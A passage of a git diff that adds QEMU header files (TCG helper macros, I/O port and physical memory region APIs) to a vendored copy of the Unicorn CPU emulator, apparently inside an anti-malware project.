DEF_HELPER_FLAGS_1(name, 0, ret, t1) +#define DEF_HELPER_2(name, ret, t1, t2) \ + DEF_HELPER_FLAGS_2(name, 0, ret, t1, t2) +#define DEF_HELPER_3(name, ret, t1, t2, t3) \ + DEF_HELPER_FLAGS_3(name, 0, ret, t1, t2, t3) +#define DEF_HELPER_4(name, ret, t1, t2, t3, t4) \ + DEF_HELPER_FLAGS_4(name, 0, ret, t1, t2, t3, t4) +#define DEF_HELPER_5(name, ret, t1, t2, t3, t4, t5) \ + DEF_HELPER_FLAGS_5(name, 0, ret, t1, t2, t3, t4, t5) + +/* MAX_OPC_PARAM_IARGS must be set to n if last entry is DEF_HELPER_FLAGS_n. */ + +#endif /* DEF_HELPER_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-proto.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-proto.h new file mode 100644 index 0000000..828951c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-proto.h @@ -0,0 +1,39 @@ +/* Helper file for declaring TCG helper functions. + This one expands prototypes for the helper functions. 
*/ + +#ifndef HELPER_PROTO_H +#define HELPER_PROTO_H 1 + +#include <exec/helper-head.h> + +#define DEF_HELPER_FLAGS_0(name, flags, ret) \ +dh_ctype(ret) HELPER(name) (void); + +#define DEF_HELPER_FLAGS_1(name, flags, ret, t1) \ +dh_ctype(ret) HELPER(name) (dh_ctype(t1)); + +#define DEF_HELPER_FLAGS_2(name, flags, ret, t1, t2) \ +dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2)); + +#define DEF_HELPER_FLAGS_3(name, flags, ret, t1, t2, t3) \ +dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2), dh_ctype(t3)); + +#define DEF_HELPER_FLAGS_4(name, flags, ret, t1, t2, t3, t4) \ +dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2), dh_ctype(t3), \ + dh_ctype(t4)); + +#define DEF_HELPER_FLAGS_5(name, flags, ret, t1, t2, t3, t4, t5) \ +dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2), dh_ctype(t3), \ + dh_ctype(t4), dh_ctype(t5)); + +#include "helper.h" +#include "tcg-runtime.h" + +#undef DEF_HELPER_FLAGS_0 +#undef DEF_HELPER_FLAGS_1 +#undef DEF_HELPER_FLAGS_2 +#undef DEF_HELPER_FLAGS_3 +#undef DEF_HELPER_FLAGS_4 +#undef DEF_HELPER_FLAGS_5 + +#endif /* HELPER_PROTO_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-tcg.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-tcg.h new file mode 100644 index 0000000..5b12f31 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-tcg.h @@ -0,0 +1,48 @@ +/* Helper file for declaring TCG helper functions. + This one defines data structures private to tcg.c. 
*/ + +#ifndef HELPER_TCG_H +#define HELPER_TCG_H 1 + +#include <exec/helper-head.h> + +#define DEF_HELPER_FLAGS_0(NAME, FLAGS, ret) \ + { HELPER(NAME), #NAME, FLAGS, \ + dh_sizemask(ret, 0) }, + +#define DEF_HELPER_FLAGS_1(NAME, FLAGS, ret, t1) \ + { HELPER(NAME), #NAME, FLAGS, \ + dh_sizemask(ret, 0) | dh_sizemask(t1, 1) }, + +#define DEF_HELPER_FLAGS_2(NAME, FLAGS, ret, t1, t2) \ + { HELPER(NAME), #NAME, FLAGS, \ + dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \ + | dh_sizemask(t2, 2) }, + +#define DEF_HELPER_FLAGS_3(NAME, FLAGS, ret, t1, t2, t3) \ + { HELPER(NAME), #NAME, FLAGS, \ + dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \ + | dh_sizemask(t2, 2) | dh_sizemask(t3, 3) }, + +#define DEF_HELPER_FLAGS_4(NAME, FLAGS, ret, t1, t2, t3, t4) \ + { HELPER(NAME), #NAME, FLAGS, \ + dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \ + | dh_sizemask(t2, 2) | dh_sizemask(t3, 3) | dh_sizemask(t4, 4) }, + +#define DEF_HELPER_FLAGS_5(NAME, FLAGS, ret, t1, t2, t3, t4, t5) \ + { HELPER(NAME), #NAME, FLAGS, \ + dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \ + | dh_sizemask(t2, 2) | dh_sizemask(t3, 3) | dh_sizemask(t4, 4) \ + | dh_sizemask(t5, 5) }, + +#include "helper.h" +#include "tcg-runtime.h" + +#undef DEF_HELPER_FLAGS_0 +#undef DEF_HELPER_FLAGS_1 +#undef DEF_HELPER_FLAGS_2 +#undef DEF_HELPER_FLAGS_3 +#undef DEF_HELPER_FLAGS_4 +#undef DEF_HELPER_FLAGS_5 + +#endif /* HELPER_TCG_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/hwaddr.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/hwaddr.h new file mode 100644 index 0000000..8ac8394 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/hwaddr.h @@ -0,0 +1,22 @@ +/* Define hwaddr if it exists. */ + +#ifndef HWADDR_H +#define HWADDR_H + +#define HWADDR_BITS 64 +/* hwaddr is the type of a physical address (its size can + be different from 'target_ulong'). 
*/ + +#include "unicorn/platform.h" + +typedef uint64_t hwaddr; +#define HWADDR_MAX UINT64_MAX +#define TARGET_FMT_plx "%016" PRIx64 +#define HWADDR_PRId PRId64 +#define HWADDR_PRIi PRIi64 +#define HWADDR_PRIo PRIo64 +#define HWADDR_PRIu PRIu64 +#define HWADDR_PRIx PRIx64 +#define HWADDR_PRIX PRIX64 + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/ioport.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/ioport.h new file mode 100644 index 0000000..0d32c89 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/ioport.h @@ -0,0 +1,59 @@ +/* + * defines ioport related functions + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
+ */ + +/************************************************************************** + * IO ports API + */ + +#ifndef IOPORT_H +#define IOPORT_H + +#include "qemu-common.h" +#include "qom/object.h" +#include "exec/memory.h" + +typedef uint32_t pio_addr_t; +#define FMT_pioaddr PRIx32 + +#define MAX_IOPORTS (64 * 1024) +#define IOPORTS_MASK (MAX_IOPORTS - 1) + +typedef struct MemoryRegionPortio { + uint32_t offset; + uint32_t len; + unsigned size; + uint32_t (*read)(void *opaque, uint32_t address); + void (*write)(void *opaque, uint32_t address, uint32_t data); + uint32_t base; /* private field */ +} MemoryRegionPortio; + +#define PORTIO_END_OF_LIST() { } + +#ifndef CONFIG_USER_ONLY +extern const MemoryRegionOps unassigned_io_ops; +#endif + +void cpu_outb(struct uc_struct *uc, pio_addr_t addr, uint8_t val); +void cpu_outw(struct uc_struct *uc, pio_addr_t addr, uint16_t val); +void cpu_outl(struct uc_struct *uc, pio_addr_t addr, uint32_t val); +uint8_t cpu_inb(struct uc_struct *uc, pio_addr_t addr); +uint16_t cpu_inw(struct uc_struct *uc, pio_addr_t addr); +uint32_t cpu_inl(struct uc_struct *uc, pio_addr_t addr); + +#endif /* IOPORT_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/memory-internal.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/memory-internal.h new file mode 100644 index 0000000..d3546d2 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/memory-internal.h @@ -0,0 +1,36 @@ +/* + * Declarations for obsolete exec.c functions + * + * Copyright 2011 Red Hat, Inc. and/or its affiliates + * + * Authors: + * Avi Kivity <avi@redhat.com> + * + * This work is licensed under the terms of the GNU GPL, version 2 or + * later. See the COPYING file in the top-level directory. + * + */ + +/* + * This header is for use by exec.c and memory.c ONLY. Do not include it. + * The functions declared here will be removed soon. 
+ */ + +#ifndef MEMORY_INTERNAL_H +#define MEMORY_INTERNAL_H + +#ifndef CONFIG_USER_ONLY +typedef struct AddressSpaceDispatch AddressSpaceDispatch; + +void address_space_init_dispatch(AddressSpace *as); +void address_space_destroy_dispatch(AddressSpace *as); + +extern const MemoryRegionOps unassigned_mem_ops; + +bool memory_region_access_valid(MemoryRegion *mr, hwaddr addr, + unsigned size, bool is_write); + +void address_space_unregister(AddressSpace *as); + +#endif +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/memory.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/memory.h new file mode 100644 index 0000000..ef28b9d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/memory.h @@ -0,0 +1,864 @@ +/* + * Physical memory management API + * + * Copyright 2011 Red Hat, Inc. and/or its affiliates + * + * Authors: + * Avi Kivity <avi@redhat.com> + * + * This work is licensed under the terms of the GNU GPL, version 2. See + * the COPYING file in the top-level directory. + * + */ + +#ifndef MEMORY_H +#define MEMORY_H + +#ifndef CONFIG_USER_ONLY + +#define DIRTY_MEMORY_CODE 0 +#define DIRTY_MEMORY_NUM 1 /* num of dirty bits */ + +#include "unicorn/platform.h" +#include "qemu-common.h" +#include "exec/cpu-common.h" +#include "exec/hwaddr.h" +#include "qemu/queue.h" +#include "qemu/int128.h" +#include "qapi/error.h" +#include "qom/object.h" + +#define MAX_PHYS_ADDR_SPACE_BITS 62 +#define MAX_PHYS_ADDR (((hwaddr)1 << MAX_PHYS_ADDR_SPACE_BITS) - 1) + +#define TYPE_MEMORY_REGION "qemu:memory-region" +#define MEMORY_REGION(uc, obj) \ + OBJECT_CHECK(uc, MemoryRegion, (obj), TYPE_MEMORY_REGION) + +typedef struct MemoryRegionOps MemoryRegionOps; +typedef struct MemoryRegionMmio MemoryRegionMmio; + +struct MemoryRegionMmio { + CPUReadMemoryFunc *read[3]; + CPUWriteMemoryFunc *write[3]; +}; + +typedef struct IOMMUTLBEntry IOMMUTLBEntry; + +/* See address_space_translate: bit 0 is read, bit 1 is write. 
*/ +typedef enum { + IOMMU_NONE = 0, + IOMMU_RO = 1, + IOMMU_WO = 2, + IOMMU_RW = 3, +} IOMMUAccessFlags; + +struct IOMMUTLBEntry { + AddressSpace *target_as; + hwaddr iova; + hwaddr translated_addr; + hwaddr addr_mask; /* 0xfff = 4k translation */ + IOMMUAccessFlags perm; +}; + +/* + * Memory region callbacks + */ +struct MemoryRegionOps { + /* Read from the memory region. @addr is relative to @mr; @size is + * in bytes. */ + uint64_t (*read)(struct uc_struct* uc, void *opaque, + hwaddr addr, + unsigned size); + /* Write to the memory region. @addr is relative to @mr; @size is + * in bytes. */ + void (*write)(struct uc_struct* uc, void *opaque, + hwaddr addr, + uint64_t data, + unsigned size); + + enum device_endian endianness; + /* Guest-visible constraints: */ + struct { + /* If nonzero, specify bounds on access sizes beyond which a machine + * check is thrown. + */ + unsigned min_access_size; + unsigned max_access_size; + /* If true, unaligned accesses are supported. Otherwise unaligned + * accesses throw machine checks. + */ + bool unaligned; + /* + * If present, and returns #false, the transaction is not accepted + * by the device (and results in machine dependent behaviour such + * as a machine check exception). + */ + bool (*accepts)(void *opaque, hwaddr addr, + unsigned size, bool is_write); + } valid; + /* Internal implementation constraints: */ + struct { + /* If nonzero, specifies the minimum size implemented. Smaller sizes + * will be rounded upwards and a partial result will be returned. + */ + unsigned min_access_size; + /* If nonzero, specifies the maximum size implemented. Larger sizes + * will be done as a series of accesses with smaller sizes. + */ + unsigned max_access_size; + /* If true, unaligned accesses are supported. Otherwise all accesses + * are converted to (possibly multiple) naturally aligned accesses. 
+ */ + bool unaligned; + } impl; + + /* If .read and .write are not present, old_mmio may be used for + * backwards compatibility with old mmio registration + */ + const MemoryRegionMmio old_mmio; +}; + +typedef struct MemoryRegionIOMMUOps MemoryRegionIOMMUOps; + +struct MemoryRegionIOMMUOps { + /* Return a TLB entry that contains a given address. */ + IOMMUTLBEntry (*translate)(MemoryRegion *iommu, hwaddr addr, bool is_write); +}; + +struct MemoryRegion { + Object parent_obj; + /* All fields are private - violators will be prosecuted */ + const MemoryRegionOps *ops; + const MemoryRegionIOMMUOps *iommu_ops; + void *opaque; + MemoryRegion *container; + Int128 size; + hwaddr addr; + void (*destructor)(MemoryRegion *mr); + ram_addr_t ram_addr; + uint64_t align; + bool subpage; + bool terminates; + bool romd_mode; + bool ram; + bool skip_dump; + bool readonly; /* For RAM regions */ + bool enabled; + bool rom_device; + bool warning_printed; /* For reservations */ + MemoryRegion *alias; + hwaddr alias_offset; + int32_t priority; + bool may_overlap; + QTAILQ_HEAD(subregions, MemoryRegion) subregions; + QTAILQ_ENTRY(MemoryRegion) subregions_link; + const char *name; + uint8_t dirty_log_mask; + struct uc_struct *uc; + uint32_t perms; //all perms, partially redundant with readonly + uint64_t end; +}; + +/** + * MemoryListener: callbacks structure for updates to the physical memory map + * + * Allows a component to adjust to changes in the guest-visible memory map. + * Use with memory_listener_register() and memory_listener_unregister(). 
+ */ +struct MemoryListener { + void (*begin)(MemoryListener *listener); + void (*commit)(MemoryListener *listener); + void (*region_add)(MemoryListener *listener, MemoryRegionSection *section); + void (*region_del)(MemoryListener *listener, MemoryRegionSection *section); + void (*region_nop)(MemoryListener *listener, MemoryRegionSection *section); + void (*log_start)(MemoryListener *listener, MemoryRegionSection *section); + void (*log_stop)(MemoryListener *listener, MemoryRegionSection *section); + void (*log_sync)(MemoryListener *listener, MemoryRegionSection *section); + void (*log_global_start)(MemoryListener *listener); + void (*log_global_stop)(MemoryListener *listener); + /* Lower = earlier (during add), later (during del) */ + unsigned priority; + AddressSpace *address_space_filter; + QTAILQ_ENTRY(MemoryListener) link; +}; + +/** + * AddressSpace: describes a mapping of addresses to #MemoryRegion objects + */ +struct AddressSpace { + /* All fields are private. */ + char *name; + MemoryRegion *root; + struct FlatView *current_map; + struct AddressSpaceDispatch *dispatch; + struct AddressSpaceDispatch *next_dispatch; + MemoryListener dispatch_listener; + struct uc_struct* uc; + + QTAILQ_ENTRY(AddressSpace) address_spaces_link; +}; + +/** + * MemoryRegionSection: describes a fragment of a #MemoryRegion + * + * @mr: the region, or %NULL if empty + * @address_space: the address space the region is mapped in + * @offset_within_region: the beginning of the section, relative to @mr's start + * @size: the size of the section; will not exceed @mr's boundaries + * @offset_within_address_space: the address of the first byte of the section + * relative to the region's address space + * @readonly: writes to this section are ignored + */ +struct MemoryRegionSection { + MemoryRegion *mr; + AddressSpace *address_space; + hwaddr offset_within_region; + Int128 size; + hwaddr offset_within_address_space; + bool readonly; +}; + +static inline MemoryRegionSection 
MemoryRegionSection_make(MemoryRegion *mr, AddressSpace *address_space, + hwaddr offset_within_region, Int128 size, hwaddr offset_within_address_space, bool readonly) +{ + MemoryRegionSection section; + section.mr = mr; + section.address_space = address_space; + section.offset_within_region = offset_within_region; + section.size = size; + section.offset_within_address_space = offset_within_address_space; + section.readonly = readonly; + return section; +} + +/** + * memory_region_init: Initialize a memory region + * + * The region typically acts as a container for other memory regions. Use + * memory_region_add_subregion() to add subregions. + * + * @mr: the #MemoryRegion to be initialized + * @owner: the object that tracks the region's reference count + * @name: used for debugging; not visible to the user or ABI + * @size: size of the region; any subregions beyond this size will be clipped + */ +void memory_region_init(struct uc_struct *uc, MemoryRegion *mr, + struct Object *owner, + const char *name, + uint64_t size); + +/** + * memory_region_ref: Add 1 to a memory region's reference count + * + * Whenever memory regions are accessed outside the BQL, they need to be + * preserved against hot-unplug. MemoryRegions actually do not have their + * own reference count; they piggyback on a QOM object, their "owner". + * This function adds a reference to the owner. + * + * All MemoryRegions must have an owner if they can disappear, even if the + * device they belong to operates exclusively under the BQL. This is because + * the region could be returned at any time by memory_region_find, and this + * is usually under guest control. + * + * @mr: the #MemoryRegion + */ +void memory_region_ref(MemoryRegion *mr); + +/** + * memory_region_unref: Remove 1 to a memory region's reference count + * + * Whenever memory regions are accessed outside the BQL, they need to be + * preserved against hot-unplug. 
MemoryRegions actually do not have their + * own reference count; they piggyback on a QOM object, their "owner". + * This function removes a reference to the owner and possibly destroys it. + * + * @mr: the #MemoryRegion + */ +void memory_region_unref(MemoryRegion *mr); + +/** + * memory_region_init_io: Initialize an I/O memory region. + * + * Accesses into the region will cause the callbacks in @ops to be called. + * if @size is nonzero, subregions will be clipped to @size. + * + * @mr: the #MemoryRegion to be initialized. + * @owner: the object that tracks the region's reference count + * @ops: a structure containing read and write callbacks to be used when + * I/O is performed on the region. + * @opaque: passed to to the read and write callbacks of the @ops structure. + * @name: used for debugging; not visible to the user or ABI + * @size: size of the region. + */ +void memory_region_init_io(struct uc_struct *uc, MemoryRegion *mr, + struct Object *owner, + const MemoryRegionOps *ops, + void *opaque, + const char *name, + uint64_t size); + +/** + * memory_region_init_ram: Initialize RAM memory region. Accesses into the + * region will modify memory directly. + * + * @mr: the #MemoryRegion to be initialized. + * @owner: the object that tracks the region's reference count + * @name: the name of the region. + * @size: size of the region. + * @perms: permissions on the region (UC_PROT_READ, UC_PROT_WRITE, UC_PROT_EXEC). + * @errp: pointer to Error*, to store an error if it happens. + */ +void memory_region_init_ram(struct uc_struct *uc, MemoryRegion *mr, + struct Object *owner, + const char *name, + uint64_t size, + uint32_t perms, + Error **errp); + +/** + * memory_region_init_ram_ptr: Initialize RAM memory region from a + * user-provided pointer. Accesses into the + * region will modify memory directly. + * + * @mr: the #MemoryRegion to be initialized. + * @owner: the object that tracks the region's reference count + * @name: the name of the region. 
+ * @size: size of the region. + * @ptr: memory to be mapped; must contain at least @size bytes. + */ +void memory_region_init_ram_ptr(struct uc_struct *uc, MemoryRegion *mr, + struct Object *owner, + const char *name, + uint64_t size, + void *ptr); + +/** + * memory_region_init_alias: Initialize a memory region that aliases all or a + * part of another memory region. + * + * @mr: the #MemoryRegion to be initialized. + * @owner: the object that tracks the region's reference count + * @name: used for debugging; not visible to the user or ABI + * @orig: the region to be referenced; @mr will be equivalent to + * @orig between @offset and @offset + @size - 1. + * @offset: start of the section in @orig to be referenced. + * @size: size of the region. + */ +void memory_region_init_alias(struct uc_struct *uc, MemoryRegion *mr, + struct Object *owner, + const char *name, + MemoryRegion *orig, + hwaddr offset, + uint64_t size); + +/** + * memory_region_init_rom_device: Initialize a ROM memory region. Writes are + * handled via callbacks. + * + * @mr: the #MemoryRegion to be initialized. + * @owner: the object that tracks the region's reference count + * @ops: callbacks for write access handling. + * @name: the name of the region. + * @size: size of the region. + * @errp: pointer to Error*, to store an error if it happens. + */ +void memory_region_init_rom_device(MemoryRegion *mr, + struct Object *owner, + const MemoryRegionOps *ops, + void *opaque, + const char *name, + uint64_t size, + Error **errp); + +/** + * memory_region_init_reservation: Initialize a memory region that reserves + * I/O space. + * + * A reservation region primariy serves debugging purposes. It claims I/O + * space that is not supposed to be handled by QEMU itself. Any access via + * the memory API will cause an abort(). 
+ * + * @mr: the #MemoryRegion to be initialized + * @owner: the object that tracks the region's reference count + * @name: used for debugging; not visible to the user or ABI + * @size: size of the region. + */ +void memory_region_init_reservation(struct uc_struct *uc, MemoryRegion *mr, + struct Object *owner, + const char *name, + uint64_t size); + +/** + * memory_region_init_iommu: Initialize a memory region that translates + * addresses + * + * An IOMMU region translates addresses and forwards accesses to a target + * memory region. + * + * @mr: the #MemoryRegion to be initialized + * @owner: the object that tracks the region's reference count + * @ops: a function that translates addresses into the @target region + * @name: used for debugging; not visible to the user or ABI + * @size: size of the region. + */ +void memory_region_init_iommu(MemoryRegion *mr, + struct Object *owner, + const MemoryRegionIOMMUOps *ops, + const char *name, + uint64_t size); + +/** + * memory_region_size: get a memory region's size. + * + * @mr: the memory region being queried. + */ +uint64_t memory_region_size(MemoryRegion *mr); + +/** + * memory_region_is_ram: check whether a memory region is random access + * + * Returns %true is a memory region is random access. + * + * @mr: the memory region being queried + */ +bool memory_region_is_ram(MemoryRegion *mr); + +/** + * memory_region_is_skip_dump: check whether a memory region should not be + * dumped + * + * Returns %true is a memory region should not be dumped(e.g. VFIO BAR MMAP). 
+ * + * @mr: the memory region being queried + */ +bool memory_region_is_skip_dump(MemoryRegion *mr); + +/** + * memory_region_set_skip_dump: Set skip_dump flag, dump will ignore this memory + * region + * + * @mr: the memory region being queried + */ +void memory_region_set_skip_dump(MemoryRegion *mr); + +/** + * memory_region_is_romd: check whether a memory region is in ROMD mode + * + * Returns %true if a memory region is a ROM device and currently set to allow + * direct reads. + * + * @mr: the memory region being queried + */ +static inline bool memory_region_is_romd(MemoryRegion *mr) +{ + return mr->rom_device && mr->romd_mode; +} + +/** + * memory_region_is_iommu: check whether a memory region is an iommu + * + * Returns %true is a memory region is an iommu. + * + * @mr: the memory region being queried + */ +bool memory_region_is_iommu(MemoryRegion *mr); + +/** + * memory_region_notify_iommu: notify a change in an IOMMU translation entry. + * + * @mr: the memory region that was changed + * @entry: the new entry in the IOMMU translation table. The entry + * replaces all old entries for the same virtual I/O address range. + * Deleted entries have .@perm == 0. + */ +void memory_region_notify_iommu(MemoryRegion *mr, + IOMMUTLBEntry entry); + +/** + * memory_region_name: get a memory region's name + * + * Returns the string that was used to initialize the memory region. + * + * @mr: the memory region being queried + */ +const char *memory_region_name(const MemoryRegion *mr); + +/** + * memory_region_is_logging: return whether a memory region is logging writes + * + * Returns %true if the memory region is logging writes + * + * @mr: the memory region being queried + */ +bool memory_region_is_logging(MemoryRegion *mr); + +/** + * memory_region_is_rom: check whether a memory region is ROM + * + * Returns %true is a memory region is read-only memory. 
+ * + * @mr: the memory region being queried + */ +bool memory_region_is_rom(MemoryRegion *mr); + +/** + * memory_region_get_fd: Get a file descriptor backing a RAM memory region. + * + * Returns a file descriptor backing a file-based RAM memory region, + * or -1 if the region is not a file-based RAM memory region. + * + * @mr: the RAM or alias memory region being queried. + */ +int memory_region_get_fd(MemoryRegion *mr); + +/** + * memory_region_get_ram_ptr: Get a pointer into a RAM memory region. + * + * Returns a host pointer to a RAM memory region (created with + * memory_region_init_ram() or memory_region_init_ram_ptr()). Use with + * care. + * + * @mr: the memory region being queried. + */ +void *memory_region_get_ram_ptr(MemoryRegion *mr); + +/** + * memory_region_set_readonly: Turn a memory region read-only (or read-write) + * + * Allows a memory region to be marked as read-only (turning it into a ROM). + * only useful on RAM regions. + * + * @mr: the region being updated. + * @readonly: whether rhe region is to be ROM or RAM. + */ +void memory_region_set_readonly(MemoryRegion *mr, bool readonly); + +/** + * memory_region_rom_device_set_romd: enable/disable ROMD mode + * + * Allows a ROM device (initialized with memory_region_init_rom_device() to + * set to ROMD mode (default) or MMIO mode. When it is in ROMD mode, the + * device is mapped to guest memory and satisfies read access directly. + * When in MMIO mode, reads are forwarded to the #MemoryRegion.read function. + * Writes are always handled by the #MemoryRegion.write function. + * + * @mr: the memory region to be updated + * @romd_mode: %true to put the region into ROMD mode + */ +void memory_region_rom_device_set_romd(MemoryRegion *mr, bool romd_mode); + +/** + * memory_region_add_subregion: Add a subregion to a container. + * + * Adds a subregion at @offset. The subregion may not overlap with other + * subregions (except for those explicitly marked as overlapping). 
A region + * may only be added once as a subregion (unless removed with + * memory_region_del_subregion()); use memory_region_init_alias() if you + * want a region to be a subregion in multiple locations. + * + * @mr: the region to contain the new subregion; must be a container + * initialized with memory_region_init(). + * @offset: the offset relative to @mr where @subregion is added. + * @subregion: the subregion to be added. + */ +void memory_region_add_subregion(MemoryRegion *mr, + hwaddr offset, + MemoryRegion *subregion); +/** + * memory_region_add_subregion_overlap: Add a subregion to a container + * with overlap. + * + * Adds a subregion at @offset. The subregion may overlap with other + * subregions. Conflicts are resolved by having a higher @priority hide a + * lower @priority. Subregions without priority are taken as @priority 0. + * A region may only be added once as a subregion (unless removed with + * memory_region_del_subregion()); use memory_region_init_alias() if you + * want a region to be a subregion in multiple locations. + * + * @mr: the region to contain the new subregion; must be a container + * initialized with memory_region_init(). + * @offset: the offset relative to @mr where @subregion is added. + * @subregion: the subregion to be added. + * @priority: used for resolving overlaps; highest priority wins. + */ +void memory_region_add_subregion_overlap(MemoryRegion *mr, + hwaddr offset, + MemoryRegion *subregion, + int priority); + +/** + * memory_region_get_ram_addr: Get the ram address associated with a memory + * region + * + * DO NOT USE THIS FUNCTION. This is a temporary workaround while the Xen + * code is being reworked. + */ +ram_addr_t memory_region_get_ram_addr(MemoryRegion *mr); + +uint64_t memory_region_get_alignment(const MemoryRegion *mr); + +/** + * memory_region_del_subregion: Remove a subregion. + * + * Removes a subregion from its container. + * + * @mr: the container to be updated. 
+ * @subregion: the region being removed; must be a current subregion of @mr.
+ */
+void memory_region_del_subregion(MemoryRegion *mr,
+ MemoryRegion *subregion);
+
+/*
+ * memory_region_set_enabled: dynamically enable or disable a region
+ *
+ * Enables or disables a memory region. A disabled memory region
+ * ignores all accesses to itself and its subregions. It does not
+ * obscure sibling subregions with lower priority - it simply behaves as
+ * if it was removed from the hierarchy.
+ *
+ * Regions default to being enabled.
+ *
+ * @mr: the region to be updated
+ * @enabled: whether to enable or disable the region
+ */
+void memory_region_set_enabled(MemoryRegion *mr, bool enabled);
+
+/*
+ * memory_region_set_address: dynamically update the address of a region
+ *
+ * Dynamically updates the address of a region, relative to its container.
+ * May be used on regions that are currently part of a memory hierarchy.
+ *
+ * @mr: the region to be updated
+ * @addr: new address, relative to container region
+ */
+void memory_region_set_address(MemoryRegion *mr, hwaddr addr);
+
+/*
+ * memory_region_set_alias_offset: dynamically update a memory alias's offset
+ *
+ * Dynamically updates the offset into the target region that an alias points
+ * to, as if the fourth argument to memory_region_init_alias() has changed.
+ *
+ * @mr: the #MemoryRegion to be updated; should be an alias.
+ * @offset: the new offset into the target memory region
+ */
+void memory_region_set_alias_offset(MemoryRegion *mr,
+ hwaddr offset);
+
+/**
+ * memory_region_present: checks if an address relative to a @container
+ * translates into #MemoryRegion within @container
+ *
+ * Answer whether a #MemoryRegion within @container covers the address
+ * @addr. 
+ * + * @container: a #MemoryRegion within which @addr is a relative address + * @addr: the area within @container to be searched + */ +bool memory_region_present(MemoryRegion *container, hwaddr addr); + +/** + * memory_region_is_mapped: returns true if #MemoryRegion is mapped + * into any address space. + * + * @mr: a #MemoryRegion which should be checked if it's mapped + */ +bool memory_region_is_mapped(MemoryRegion *mr); + +/** + * memory_region_find: translate an address/size relative to a + * MemoryRegion into a #MemoryRegionSection. + * + * Locates the first #MemoryRegion within @mr that overlaps the range + * given by @addr and @size. + * + * Returns a #MemoryRegionSection that describes a contiguous overlap. + * It will have the following characteristics: + * .@size = 0 iff no overlap was found + * .@mr is non-%NULL iff an overlap was found + * + * Remember that in the return value the @offset_within_region is + * relative to the returned region (in the .@mr field), not to the + * @mr argument. + * + * Similarly, the .@offset_within_address_space is relative to the + * address space that contains both regions, the passed and the + * returned one. However, in the special case where the @mr argument + * has no container (and thus is the root of the address space), the + * following will hold: + * .@offset_within_address_space >= @addr + * .@offset_within_address_space + .@size <= @addr + @size + * + * @mr: a MemoryRegion within which @addr is a relative address + * @addr: start of the area within @as to be searched + * @size: size of the area to be searched + */ +MemoryRegionSection memory_region_find(MemoryRegion *mr, + hwaddr addr, uint64_t size); + +/** + * memory_region_transaction_begin: Start a transaction. + * + * During a transaction, changes will be accumulated and made visible + * only when the transaction ends (is committed). 
+ */
+void memory_region_transaction_begin(struct uc_struct*);
+
+/**
+ * memory_region_transaction_commit: Commit a transaction and make changes
+ * visible to the guest.
+ */
+void memory_region_transaction_commit(struct uc_struct*);
+
+/**
+ * memory_listener_register: register callbacks to be called when memory
+ * sections are mapped or unmapped into an address
+ * space
+ *
+ * @listener: an object containing the callbacks to be called
+ * @filter: if non-%NULL, only regions in this address space will be observed
+ */
+void memory_listener_register(struct uc_struct* uc, MemoryListener *listener, AddressSpace *filter);
+
+/**
+ * memory_listener_unregister: undo the effect of memory_listener_register()
+ *
+ * @listener: an object containing the callbacks to be removed
+ */
+void memory_listener_unregister(struct uc_struct* uc, MemoryListener *listener);
+
+/**
+ * address_space_init: initializes an address space
+ *
+ * @as: an uninitialized #AddressSpace
+ * @root: a #MemoryRegion that routes addresses for the address space
+ * @name: an address space name. The name is only used for debugging
+ * output.
+ */
+void address_space_init(struct uc_struct *uc, AddressSpace *as, MemoryRegion *root, const char *name);
+
+
+/**
+ * address_space_destroy: destroy an address space
+ *
+ * Releases all resources associated with an address space. After an address space
+ * is destroyed, its root memory region (given by address_space_init()) may be destroyed
+ * as well.
+ *
+ * @as: address space to be destroyed
+ */
+void address_space_destroy(AddressSpace *as);
+
+/**
+ * address_space_rw: read from or write to an address space.
+ *
+ * Return true if the operation hit any unassigned memory or encountered an
+ * IOMMU fault. 
